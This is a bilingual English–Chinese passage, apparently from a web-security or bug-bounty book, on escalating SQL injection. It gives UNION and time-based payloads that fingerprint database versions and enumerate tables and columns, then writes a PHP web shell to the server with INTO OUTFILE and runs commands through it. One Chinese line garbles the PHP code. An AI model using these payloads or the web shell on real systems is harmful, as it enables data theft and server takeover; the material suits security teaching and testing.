Question

Attackers most often use SQL injections to extract information from the database. Successfully collecting data from a SQL injection is a technical task that can sometimes be complicated. Here are some tips you can use to gain information about a target for exploitation.

攻击者最常使用 SQL 注入从数据库中提取信息。成功从 SQL 注入收集数据是一项技术任务，有时可能会很复杂。以下是一些提示，可用于获取有关目标的信息以进行利用。

Learn About the Database

First, it’s useful to gain information about the structure of the database. Notice that many of the payloads that I’ve used in this chapter require some knowledge of the database, such as table names and field names.

首先，获取有关数据库结构的信息非常有用。请注意，我在本章中使用的许多有效载荷都需要一些了解数据库的知识，例如表名和字段名。

To start with, you need to determine the database software and its structure. Attempt some trial-and-error SQL queries to determine the database version. Each type of database will have different functions for returning their version numbers, but the query should look something like this:

首先，您需要确定数据库软件及其结构。尝试一些试错的 SQL 查询，以确定数据库版本。每种类型的数据库都有不同的返回版本号的功能，但查询应该看起来像这样：

SELECT Title, Body FROM Emails
WHERE Username='vickie'
UNION SELECT 1, @@version;--

Some common commands for querying the version type are @@version for Microsoft SQL Server and MySQL, version() for PostgreSQL, and v$version for Oracle. The 1 in the UNION SELECT 1, DATABASE_VERSION_QUERY ;-- line is necessary, because for a UNION statement to work, the two SELECT statements it connects need to have the same number of columns. The first 1 is essentially a dummy column name that you can use to match column numbers.

查询版本类型的一些常见命令包括用于 Microsoft SQL Server 和 MySQL 的 @@version，用于 PostgreSQL 的 version() 以及用于 Oracle 的 v$version。UNION SELECT 1, DATABASE_VERSION_QUERY;--行中的 1 是必需的，因为要使 UNION 语句起作用，它连接的两个 SELECT 语句需要具有相同数量的列。第一个 1 实际上是一个虚拟列名，您可以使用它来匹配列号。

Once you know the kind of database you’re working with, you could start to scope it out further to see what it contains. This query in MySQL will show you the table names of user-defined tables:

一旦你知道你正在处理的数据库类型，你可以进一步确认它包含了什么内容。在 MySQL 中，以下查询可以展示用户自定义表的表名：

SELECT Title, Body FROM Emails
WHERE Username='vickie'
UNION SELECT 1, table_name FROM information_schema.tables

And this one will show you the column names of the specified table. In this case, the query will list the columns in the Users table:

这个将会显示指定表格的列名。在这个案例中，查询会列出 Users 表格中的列：

SELECT Title, Body FROM Emails
WHERE Username='vickie'
UNION SELECT 1, column_name FROM information_schema.columns
WHERE table_name = 'Users'

All of these techniques are possible during classic and blind attacks. You just need to find a different way to fit those commands into your constructed queries. For instance, you can determine a database’s version with a time-based technique like so:

所有这些技术都可以在经典攻击和盲目攻击期间使用。您只需要找到将这些命令嵌入您构建的查询中的不同方法。例如，您可以使用基于时间的技术确定数据库的版本，如下所示:

SELECT * FROM PremiumUsers WHERE Id='2'
UNION SELECT IF(SUBSTR(@@version, 1, 1) = '1', SLEEP(10), 0); --

After you’ve learned about the database’s structure, start targeting certain tables to exfiltrate data that interests you.

学习了数据库的结构之后，开始针对特定的表格窃取你感兴趣的数据。

Gain a Web Shell

Another way to escalate SQL injections is to attempt to gain a web shell on the server. Let’s say we’re targeting a PHP application. The following piece of PHP code will take the request parameter named cmd and execute it as a system command:

另一种升级 SQL 注入的方法是尝试在服务器上获得 Web Shell。假设我们的目标是一个 PHP 应用程序。以下的 PHP 代码将捕获名为 cmd 的请求参数，并将其作为系统命令来执行：

<? system($_REQUEST['cmd']); ?>

You can use the SQL injection vulnerability to upload this PHP code to a location that you can access on the server by using INTO OUTFILE . For example, you can write the password of a nonexistent user and the PHP code <? system($_REQUEST['cmd']); ?> into a file located at /var/www/html/shell.php on the target server:

您可以利用 SQL 注入漏洞，使用 INTO OUTFILE 将此 PHP 代码上传到服务器上您可以访问的位置。例如，您可以将不存在用户的密码和 PHP 代码<?系统（$ _REQUEST ['cmd']）; ?>写入位于目标服务器上的/var/www/html/shell.php 文件中。

SELECT Password FROM Users WHERE Username='abc'
UNION SELECT "<? system($_REQUEST['cmd']); ?>"
INTO OUTFILE "/var/www/html/shell.php"

Since the password of the nonexistent user will be blank, you are essentially uploading the PHP script to the shell.php file. Then you can simply access your shell.php file and execute any command you wish:

由于不存在用户的密码将为空，您基本上将上传 PHP 脚本到 shell.php 文件中。然后，您可以轻松访问您的 shell.php 文件并执行任何您希望执行的命令：

http://www.example.com/shell.php?cmd=COMMAND